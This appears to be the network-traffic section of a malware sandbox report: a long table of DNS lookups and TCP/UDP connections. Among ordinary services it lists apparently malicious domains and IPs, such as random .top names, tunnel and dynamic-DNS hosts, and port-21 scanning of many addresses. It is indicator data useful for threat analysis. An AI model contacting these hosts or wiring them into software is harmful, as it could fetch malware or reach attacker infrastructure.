| US | 8.8.8.8:53 | 133.34.90.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.233.231.54.in-addr.arpa | udp |
| TH | 58.137.135.190:8080 | 58.137.135.190 | tcp |
| US | 104.21.35.246:443 | print-vexer.biz | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server4.top | tcp |
| US | 24.252.169.236:80 | 24.252.169.236 | tcp |
| RU | 176.111.174.138:8000 | 176.111.174.138 | tcp |
| US | 8.8.8.8:53 | karoonpc.com | udp |
| RU | 92.255.57.88:80 | 92.255.57.88 | tcp |
| KR | 152.67.212.187:443 | tcp | |
| US | 8.8.8.8:53 | 190.135.137.58.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.86.121.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.169.252.24.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.22.73.219.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.57.255.92.in-addr.arpa | udp |
| CN | 120.52.95.246:80 | znrq.zifwxq.cn | tcp |
| US | 8.8.8.8:53 | sirault.be | udp |
| MX | 187.225.233.208:80 | 187.225.233.208 | tcp |
| US | 209.94.90.2:443 | bafybeicnmx2fcaolinpdaiqjo7hgsourg3qzaxf57psdrbqic4qrm4pf3i.ipfs.dweb.link | tcp |
| US | 8.8.8.8:53 | 208.233.225.187.in-addr.arpa | udp |
| RU | 176.111.174.138:443 | tcp | |
| US | 8.8.8.8:53 | client.9377.com | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| CN | 120.79.30.240:80 | client.9377.com | tcp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | www.beiletoys.com | udp |
| US | 8.8.8.8:53 | 2.90.94.209.in-addr.arpa | udp |
| CN | 139.198.15.223:8080 | tcp | |
| IR | 217.172.98.87:80 | karoonpc.com | tcp |
| IN | 43.240.65.55:81 | 43.240.65.55 | tcp |
| US | 52.217.169.73:443 | bbuseruploads.s3.amazonaws.com | tcp |
| AT | 81.10.240.105:80 | 81.10.240.105 | tcp |
| FR | 185.98.131.200:443 | sirault.be | tcp |
| IN | 116.206.151.203:478 | 116.206.151.203 | tcp |
| ES | 178.60.25.240:80 | 178.60.25.240 | tcp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| US | 8.8.8.8:53 | 73.169.217.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.98.172.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.65.240.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.131.98.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.240.10.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.25.60.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.151.206.116.in-addr.arpa | udp |
| BR | 189.61.50.98:8080 | 189.61.50.98 | tcp |
| CN | 120.77.253.240:80 | tcp | |
| US | 8.8.8.8:53 | deauduafzgezzfgm.top | udp |
| CN | 121.40.155.21:80 | www.beiletoys.com | tcp |
| US | 158.101.35.62:9000 | 158.101.35.62 | tcp |
| US | 147.185.221.22:12466 | week-dictionary.gl.at.ply.gg | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 62.35.101.158.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.50.61.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| BG | 87.120.113.235:80 | tcp | |
| US | 8.8.8.8:53 | cd.textfiles.com | udp |
| KR | 152.67.212.187:443 | tcp | |
| CN | 49.232.126.36:9000 | tcp | |
| US | 52.216.58.241:443 | bbuseruploads.s3.amazonaws.com | tcp |
| IN | 123.253.12.111:80 | 123.253.12.111 | tcp |
| RU | 185.215.113.66:80 | deauduafzgezzfgm.top | tcp |
| US | 8.8.8.8:53 | loeghaiofiehfihf.to | udp |
| US | 8.8.8.8:53 | desquer.ens.uabc.mx | udp |
| RU | 176.111.174.138:443 | tcp | |
| US | 8.8.8.8:53 | 241.58.216.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.12.253.123.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aeufoeahfouefhg.top | udp |
| US | 8.8.8.8:53 | data.yhydl.com | udp |
| US | 208.86.224.90:80 | cd.textfiles.com | tcp |
| VE | 167.250.49.155:80 | 167.250.49.155 | tcp |
| US | 8.8.8.8:53 | www.seetrol.com | udp |
| US | 8.8.8.8:53 | www.drm-x.com | udp |
| US | 8.8.8.8:53 | 90.224.86.208.in-addr.arpa | udp |
| KR | 139.150.75.206:80 | www.seetrol.com | tcp |
| US | 185.199.109.133:443 | media.githubusercontent.com | tcp |
| GB | 163.171.161.11:80 | www.drm-x.com | tcp |
| RU | 185.215.113.66:80 | aeufoeahfouefhg.top | tcp |
| MX | 148.231.192.3:80 | desquer.ens.uabc.mx | tcp |
| US | 8.8.8.8:53 | 11.161.171.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.75.150.139.in-addr.arpa | udp |
| RU | 176.113.115.203:80 | 176.113.115.203 | tcp |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| FR | 80.11.228.144:10140 | 80.11.228.144 | tcp |
| US | 8.8.8.8:53 | 3.192.231.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.228.11.80.in-addr.arpa | udp |
| HK | 156.245.12.57:8000 | 156.245.12.57 | tcp |
| RU | 176.111.174.138:443 | tcp | |
| US | 8.8.8.8:53 | artemka.spb.ru | udp |
| CN | 123.234.2.61:80 | src1.minibai.com | tcp |
| US | 8.8.8.8:53 | coindiscussion.net | udp |
| US | 8.8.8.8:53 | bafybeicoo7kwhmnl6q7prd65aimf5byzrihrklgviebm2pkyzyepdaigf4.ipfs.dweb.link | udp |
| NL | 81.161.238.172:8705 | tcp | |
| US | 8.8.8.8:53 | www.funletters.net | udp |
| US | 208.122.221.162:80 | www.funletters.net | tcp |
| US | 208.122.221.162:80 | www.funletters.net | tcp |
| US | 208.122.221.162:80 | www.funletters.net | tcp |
| US | 208.122.221.162:80 | www.funletters.net | tcp |
| US | 208.122.221.162:80 | www.funletters.net | tcp |
| US | 8.8.8.8:53 | acpressions.com | udp |
| GB | 142.250.180.2:80 | pagead2.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 34.216.117.25:80 | acpressions.com | tcp |
| US | 34.216.117.25:80 | acpressions.com | tcp |
| US | 8.8.8.8:53 | smileycons.com | udp |
| US | 8.8.8.8:53 | funletters.net | udp |
| US | 8.8.8.8:53 | thundercloud.net | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.187.226:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | www.smileycons.com | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 208.122.221.162:80 | funletters.net | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| GB | 216.58.201.98:443 | ep1.adtrafficquality.google | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 172.217.169.1:443 | ep2.adtrafficquality.google | tcp |
| GB | 172.217.169.1:443 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | 25.117.216.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | arpdabl.zapto.org | udp |
| RU | 176.111.174.138:443 | tcp | |
| US | 8.8.8.8:53 | www.pornhub.com | udp |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| US | 8.8.8.8:53 | static.trafficjunky.com | udp |
| US | 8.8.8.8:53 | ei.phncdn.com | udp |
| GB | 64.210.156.19:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.19:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.19:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.19:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.19:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.19:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.22:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.22:443 | ei.phncdn.com | tcp |
| US | 8.8.8.8:53 | 41.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | media.trafficjunky.net | udp |
| US | 8.8.8.8:53 | cdn1-smallimg.phncdn.com | udp |
| GB | 64.210.156.22:443 | media.trafficjunky.net | tcp |
| US | 66.254.114.156:443 | cdn1-smallimg.phncdn.com | tcp |
| GB | 64.210.156.19:443 | media.trafficjunky.net | tcp |
| US | 8.8.8.8:53 | 40.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | ss.phncdn.com | udp |
| US | 8.8.8.8:53 | a.adtng.com | udp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | ht-cdn2.adtng.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| GB | 64.210.156.16:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.16:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.16:443 | ht-cdn2.adtng.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | hw-cdn2.adtng.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 64.210.156.6:443 | hw-cdn2.adtng.com | tcp |
| US | 8.8.8.8:53 | 171.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | storage.googleapis.com | udp |
| GB | 142.250.187.219:443 | storage.googleapis.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 16.15.184.134:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | arcsystem.rodopibg.net | udp |
| US | 8.8.8.8:53 | fish.hackbiji.cc | udp |
| US | 8.8.8.8:53 | download.caihong.com | udp |
| CN | 58.218.215.161:80 | down.qqfarmer.com.cn | tcp |
| CN | 61.170.80.233:80 | download.haozip.com | tcp |
| CN | 119.167.229.212:80 | dow.andylab.cn | tcp |
| CN | 120.52.95.246:80 | znrq.zifwxq.cn | tcp |
| RU | 176.111.174.138:443 | tcp | |
| CN | 218.12.76.158:80 | znrq.zifwxq.cn | tcp |
| CN | 112.5.156.15:20006 | data.yhydl.com | tcp |
| RU | 185.215.113.66:80 | aeufoeahfouefhg.top | tcp |
| RU | 45.151.62.250:80 | 45.151.62.250 | tcp |
| US | 8.8.8.8:53 | pid.fly160.com | udp |
| US | 8.8.8.8:53 | upload.vina-host.com | udp |
| US | 8.8.8.8:53 | a18qqq1.oss-cn-hongkong.aliyuncs.com | udp |
| CN | 117.72.70.169:80 | tcp | |
| CN | 43.241.17.145:8899 | tcp | |
| VE | 167.250.49.155:80 | 167.250.49.155 | tcp |
| RU | 178.130.39.138:80 | artemka.spb.ru | tcp |
| VN | 103.42.55.251:9999 | 103.42.55.251 | tcp |
| KR | 183.115.102.3:80 | 183.115.102.3 | tcp |
| CN | 47.110.247.171:80 | tcp | |
| SE | 129.151.210.233:8000 | 129.151.210.233 | tcp |
| CN | 47.104.233.213:8072 | tcp | |
| US | 8.8.8.8:53 | ywxww.net | udp |
| US | 8.8.8.8:53 | funletters.net | udp |
| US | 8.8.8.8:53 | ftp.ywxww.net | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 219.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.184.15.16.in-addr.arpa | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| CN | 120.76.203.28:80 | client.9377.com | tcp |
| ES | 217.125.11.90:8080 | 217.125.11.90 | tcp |
| US | 209.94.90.2:443 | bafybeicoo7kwhmnl6q7prd65aimf5byzrihrklgviebm2pkyzyepdaigf4.ipfs.dweb.link | tcp |
| NL | 216.252.233.8:443 | coindiscussion.net | tcp |
| TH | 154.197.69.165:443 | tcp | |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| SG | 158.140.133.56:8090 | 158.140.133.56 | tcp |
| HK | 156.245.12.57:7778 | 156.245.12.57 | tcp |
| DE | 38.242.241.140:80 | tcp | |
| HK | 154.201.87.30:8888 | 154.201.87.30 | tcp |
| VN | 113.160.249.9:80 | 113.160.249.9 | tcp |
| US | 8.8.8.8:53 | a19ccc1.oss-cn-hongkong.aliyuncs.com | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 185.202.113.6:80 | 185.202.113.6 | tcp |
| HK | 103.59.103.198:80 | 103.59.103.198 | tcp |
| US | 144.34.162.13:80 | fish.hackbiji.cc | tcp |
| HK | 134.122.129.19:80 | 134.122.129.19 | tcp |
| BG | 88.80.152.1:80 | arcsystem.rodopibg.net | tcp |
| US | 8.8.8.8:53 | aefieiaehfiaehr.top | udp |
| RU | 176.113.115.33:80 | 176.113.115.33 | tcp |
| US | 52.217.227.73:443 | bbuseruploads.s3.amazonaws.com | tcp |
| VN | 125.212.220.95:443 | upload.vina-host.com | tcp |
| US | 208.122.221.162:80 | funletters.net | tcp |
| HK | 47.79.66.208:443 | a18qqq1.oss-cn-hongkong.aliyuncs.com | tcp |
| CN | 61.154.0.139:9000 | tcp | |
| CN | 47.98.177.117:8888 | tcp | |
| CN | 182.92.0.5:80 | pid.fly160.com | tcp |
| CN | 60.191.236.246:820 | ywxww.net | tcp |
| CN | 60.191.208.187:820 | ftp.ywxww.net | tcp |
| CN | 111.6.202.202:80 | download.caihong.com | tcp |
| RU | 176.113.115.203:80 | 176.113.115.203 | tcp |
| CZ | 77.240.97.71:81 | 77.240.97.71 | tcp |
| US | 8.8.8.8:53 | 233.210.151.129.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.62.151.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.39.130.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.102.115.183.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.55.42.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.233.252.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.113.202.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.152.80.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.97.240.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | melkie.cyou | udp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| NL | 82.115.223.222:8888 | 82.115.223.222 | tcp |
| US | 8.8.8.8:53 | 73.227.217.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.103.59.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.129.122.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.220.212.125.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.66.79.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.249.160.113.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.127.203.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.133.140.158.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.87.201.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.223.115.82.in-addr.arpa | udp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 34.102.78.64:9002 | 34.102.78.64 | tcp |
| US | 8.8.8.8:53 | 78-20-115-5.access.telenet.be | udp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| US | 8.8.8.8:53 | 64.78.102.34.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| HK | 47.79.66.211:443 | a19ccc1.oss-cn-hongkong.aliyuncs.com | tcp |
| US | 8.8.8.8:53 | stdown.dinju.com | udp |
| US | 154.216.20.237:80 | 154.216.20.237 | tcp |
| US | 8.8.8.8:53 | www.ojang.pe.kr | udp |
| US | 3.5.29.46:443 | bbuseruploads.s3.amazonaws.com | tcp |
| VN | 103.42.55.251:8080 | tcp | |
| BG | 87.120.113.235:80 | tcp | |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| US | 8.8.8.8:53 | 237.20.216.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.29.5.3.in-addr.arpa | udp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| HK | 154.201.87.30:8888 | 154.201.87.30 | tcp |
| CN | 139.198.15.223:8080 | tcp | |
| NL | 185.180.196.46:80 | 185.180.196.46 | tcp |
| BE | 78.20.115.5:80 | 78-20-115-5.access.telenet.be | tcp |
| US | 68.225.217.95:85 | 68.225.217.95 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.196.180.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.115.20.78.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.217.225.68.in-addr.arpa | udp |
| RU | 176.111.174.138:443 | tcp | |
| EC | 186.3.78.195:80 | 186.3.78.195 | tcp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| CN | 58.215.245.2:9000 | tcp | |
| TR | 94.73.144.130:443 | bitkiselurunsiparis.com | tcp |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| US | 8.8.8.8:53 | www.teknoarge.com | udp |
| FR | 82.127.74.198:5000 | 82.127.74.198 | tcp |
| CN | 119.167.229.212:80 | stdown.dinju.com | tcp |
| PK | 210.56.13.114:80 | 210.56.13.114 | tcp |
| KR | 119.194.226.67:80 | www.ojang.pe.kr | tcp |
| DE | 185.254.96.92:80 | 185.254.96.92 | tcp |
| US | 8.8.8.8:53 | 195.78.3.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.96.254.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.74.127.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.144.73.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.13.56.210.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.226.194.119.in-addr.arpa | udp |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| HK | 103.43.18.19:88 | 103.43.18.19 | tcp |
| US | 52.216.77.180:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 180.77.216.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.18.43.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | filelu.com | udp |
| CN | 8.134.12.90:80 | tcp | |
| GB | 103.192.179.31:80 | 103.192.179.31 | tcp |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| NL | 185.202.113.6:443 | tcp | |
| CN | 8.138.81.152:5555 | tcp | |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| CN | 60.191.236.246:820 | ywxww.net | tcp |
| US | 172.67.68.204:443 | filelu.com | tcp |
| RU | 185.215.113.205:8080 | 185.215.113.205 | tcp |
| TR | 31.145.124.122:80 | www.teknoarge.com | tcp |
| CN | 123.117.136.97:9000 | tcp | |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| US | 8.8.8.8:53 | 31.179.192.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.68.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.124.145.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.113.215.185.in-addr.arpa | udp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | win-network-checker.cc | udp |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| US | 8.8.8.8:53 | 3434.filelu.cloud | udp |
| RU | 176.111.174.138:443 | tcp | |
| US | 67.23.237.28:443 | 3434.filelu.cloud | tcp |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| US | 8.8.8.8:53 | week-dictionary.gl.at.ply.gg | udp |
| US | 147.185.221.22:12466 | week-dictionary.gl.at.ply.gg | tcp |
| US | 97.42.159.0:21 | tcp | |
| US | 146.57.201.0:21 | tcp | |
| KR | 114.204.165.0:21 | tcp | |
| ES | 81.42.122.0:21 | tcp | |
| BR | 189.101.15.0:21 | tcp | |
| EG | 154.135.23.0:21 | tcp | |
| LU | 107.189.5.6:80 | 107.189.5.6 | tcp |
| CZ | 87.249.142.126:60800 | 87.249.142.126 | tcp |
| US | 208.85.241.111:80 | 208.85.241.111 | tcp |
| US | 8.8.8.8:53 | osecweb.ir | udp |
| UA | 91.205.66.0:21 | tcp | |
| US | 172.230.173.0:21 | tcp | |
| IL | 132.75.250.0:21 | tcp | |
| US | 8.8.8.8:53 | mohibkal.publicvm.com | udp |
| GB | 25.104.140.0:21 | tcp | |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| US | 199.221.75.0:21 | tcp | |
| MA | 105.144.217.0:21 | tcp | |
| CA | 192.135.40.0:21 | tcp | |
| US | 33.255.211.0:21 | tcp | |
| US | 130.249.106.0:21 | tcp | |
| US | 8.8.8.8:53 | 6.5.189.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.142.249.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.241.85.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 22.130.53.0:21 | tcp | |
| US | 69.19.145.0:21 | tcp | |
| BR | 189.29.48.0:21 | tcp | |
| US | 208.32.65.0:21 | tcp | |
| US | 29.189.44.0:21 | tcp | |
| US | 16.139.60.0:21 | tcp | |
| US | 23.241.17.95:80 | 23.241.17.95 | tcp |
| US | 8.8.8.8:53 | cfs9.blog.daum.net | udp |
| US | 143.105.158.0:21 | tcp | |
| CN | 36.248.43.254:80 | src1.minibai.com | tcp |
| CN | 101.90.244.0:21 | tcp | |
| GB | 89.197.154.116:80 | 89.197.154.116 | tcp |
| US | 104.243.129.2:80 | 104.243.129.2 | tcp |
| BG | 87.121.86.16:80 | win-network-checker.cc | tcp |
| US | 8.8.8.8:53 | file.edunet.ac | udp |
| JP | 133.233.8.0:21 | tcp | |
| RU | 176.111.174.140:1912 | tcp | |
| US | 44.166.5.0:21 | tcp | |
| US | 104.175.223.0:21 | tcp | |
| HK | 103.87.10.156:50698 | tcp | |
| IR | 185.79.156.69:80 | osecweb.ir | tcp |
| US | 166.167.172.14:8240 | 166.167.172.14 | tcp |
| VN | 103.173.254.78:80 | 103.173.254.78 | tcp |
| US | 8.8.8.8:53 | wz.3911.com | udp |
| US | 8.8.8.8:53 | 116.154.197.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.17.241.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.129.243.104.in-addr.arpa | udp |
| IT | 46.233.169.0:21 | tcp | |
| US | 40.98.179.0:21 | tcp | |
| CL | 186.107.172.0:21 | tcp | |
| RU | 81.4.221.0:21 | tcp | |
| KR | 119.194.226.67:80 | www.ojang.pe.kr | tcp |
| CN | 119.114.170.0:21 | tcp | |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 69.156.79.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.10.87.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.254.173.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.172.167.166.in-addr.arpa | udp |
| GB | 88.221.135.105:80 | r11.o.lencr.org | tcp |
| IN | 117.200.145.0:21 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 64.160.226.0:21 | tcp | |
| US | 159.87.6.0:21 | tcp | |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 199.181.143.0:21 | tcp | |
| HK | 52.184.113.0:21 | tcp | |
| US | 208.244.233.0:21 | tcp | |
| GB | 25.183.236.0:21 | tcp | |
| IR | 2.186.8.0:21 | tcp | |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| JP | 219.98.3.0:21 | tcp | |
| TW | 182.235.203.0:21 | tcp | |
| KR | 221.143.46.92:80 | file.edunet.ac | tcp |
| KR | 211.231.99.68:80 | cfs9.blog.daum.net | tcp |
| CN | 120.26.3.86:80 | wz.3911.com | tcp |
| US | 23.130.175.0:21 | tcp | |
| GE | 176.73.124.0:21 | tcp | |
| MX | 189.164.228.0:21 | tcp | |
| NG | 41.67.132.0:21 | tcp | |
| GB | 40.228.235.0:21 | tcp | |
| US | 206.28.225.0:21 | tcp | |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | 105.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| DE | 149.227.188.0:21 | tcp | |
| US | 192.243.14.0:21 | tcp | |
| ES | 31.214.180.12:81 | 31.214.180.12 | tcp |
| CN | 106.115.252.0:21 | tcp | |
| CL | 186.21.150.0:21 | tcp | |
| US | 40.139.38.0:21 | tcp | |
| MX | 187.177.32.0:21 | tcp | |
| JP | 219.178.232.0:21 | tcp | |
| US | 71.24.132.0:21 | tcp | |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 137.244.68.0:21 | tcp | |
| CA | 142.15.35.0:21 | tcp | |
| DE | 137.248.99.0:21 | tcp | |
| CA | 70.28.134.0:21 | tcp | |
| AU | 161.143.78.0:21 | tcp | |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| CN | 119.16.238.0:21 | tcp | |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| GB | 89.197.154.116:7810 | tcp | |
| JP | 126.34.113.0:21 | tcp | |
| RU | 176.111.174.138:443 | tcp | |
| US | 74.103.241.0:21 | tcp | |
| US | 8.8.8.8:53 | 92.46.143.221.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.180.214.31.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 205.148.254.0:21 | tcp | |
| US | 132.136.65.0:21 | tcp | |
| US | 108.59.227.0:21 | tcp | |
| US | 57.248.238.0:21 | tcp | |
| NZ | 121.99.193.0:21 | tcp | |
| TR | 5.26.174.234:80 | 5.26.174.234 | tcp |
| TW | 203.204.217.190:8080 | 203.204.217.190 | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| US | 206.65.211.0:21 | tcp | |
| CH | 212.243.68.0:21 | tcp | |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| SG | 8.174.69.0:21 | tcp | |
| US | 38.66.91.0:21 | tcp | |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| CN | 121.9.116.0:21 | tcp | |
| US | 195.214.29.0:21 | tcp | |
| US | 33.207.168.0:21 | tcp | |
| GB | 86.31.166.0:21 | tcp | |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.174.26.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| CN | 58.60.79.0:21 | tcp | |
| FI | 194.137.200.0:21 | tcp | |
| CN | 47.104.173.216:9876 | tcp | |
| GB | 165.220.134.146:80 | 165.220.134.146 | tcp |
| US | 64.235.32.0:21 | tcp | |
| NL | 81.161.238.172:8705 | tcp | |
| KR | 123.43.151.0:21 | tcp | |
| US | 74.239.229.0:21 | tcp | |
| DE | 91.12.219.0:21 | tcp | |
| DE | 116.203.127.32:443 | melkie.cyou | tcp |
| US | 8.8.8.8:53 | 190.217.204.203.in-addr.arpa | udp |
| AE | 194.170.159.0:21 | tcp | |
| US | 63.38.254.0:21 | tcp | |
| CN | 60.205.131.0:21 | tcp | |
| CN | 61.147.246.0:21 | tcp | |
| SG | 39.109.191.0:21 | tcp | |
| US | 9.88.235.0:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
